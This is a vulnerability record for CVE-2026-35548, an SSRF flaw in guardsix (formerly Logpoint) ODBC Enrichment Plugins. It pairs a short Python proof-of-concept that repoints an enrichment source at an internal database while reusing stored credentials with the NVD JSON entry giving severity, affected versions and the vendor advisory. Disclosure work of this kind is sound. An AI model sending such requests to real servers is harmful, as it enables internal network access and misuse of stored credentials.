CVE-2026-35548

# Conceptual Proof of Concept for CVE-2026-35548 # This script demonstrates how an authenticated operator might exploit the logic flaw # by updating the ODBC Enrichment Source endpoint while retaining credentials. import requests TARGET_URL = "https://guardsix-server/api/enrichment/sources/{source_id}" # Attacker controlled session cookie or token HEADERS = { "Authorization": "Bearer <operator_session_token>", "Content-Type": "application/json" } # Payload changing the host to an internal target (SSRF) # The 'credentials_id' is intentionally reused from the original valid config payload = { "name": "Legitimate Looking Source", "host": "127.0.0.1", # Internal IP address "port": 3306, # Internal database port "database_name": "mysql", "credentials_id": "cred_12345_stored" # Logic flaw: credentials are not checked/rotated } response = requests.put(TARGET_URL, json=payload, headers=HEADERS, verify=False) if response.status_code == 200: print("[+] Enrichment Source updated successfully.") print("[+] Server will now attempt to connect to internal DB using stored credentials.") else: print("[-] Failed to update source.")

{"cve": {"id": "CVE-2026-35548", "sourceIdentifier": "[email protected]", "published": "2026-04-22T15:16:16.100", "lastModified": "2026-05-12T20:05:07.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in guardsix (formerly Logpoint) ODBC Enrichment Plugins before 5.2.1 (5.2.1 is used in guardsix 7.9.0.0). A logic flaw allowed stored database credentials to be reused after modification of the target Host, IP address, or Port. When editing an existing Enrichment Source, previously stored credentials were retained even if the connection endpoint was changed. An authenticated Operator user could redirect the database connection to unintended internal systems, resulting in SSRF and potential misuse of valid stored credentials."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:guardsix:logpoint:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.9.0", "matchCriteriaId": "A2D3137A-300D-4400-B643-B8E9CCDA06D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:guardsix:odbc:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.2.1", "matchCriteriaId": "4722C193-9502-4A23-88EF-8A6ED4F5EE4C"}]}]}], "references": [{"url": "https://guardsix.com/media-room#/pressreleases/logpoint-becomes-guardsix-as-europe-reassesses-sovereign-security-operations-3436974", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://servicedesk.guardsix.com/hc/en-us/articles/35555683205021-SSRF-in-ODBC-Enrichment-Source", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}